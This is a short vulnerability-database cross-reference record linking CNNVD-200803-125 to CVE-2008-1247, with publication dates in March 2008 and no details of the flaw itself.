db:CNNVDid:CNNVD-200803-125date:2008-03-10T00:00:00
db:NVDid:CVE-2008-1247date:2008-03-10T17:44:00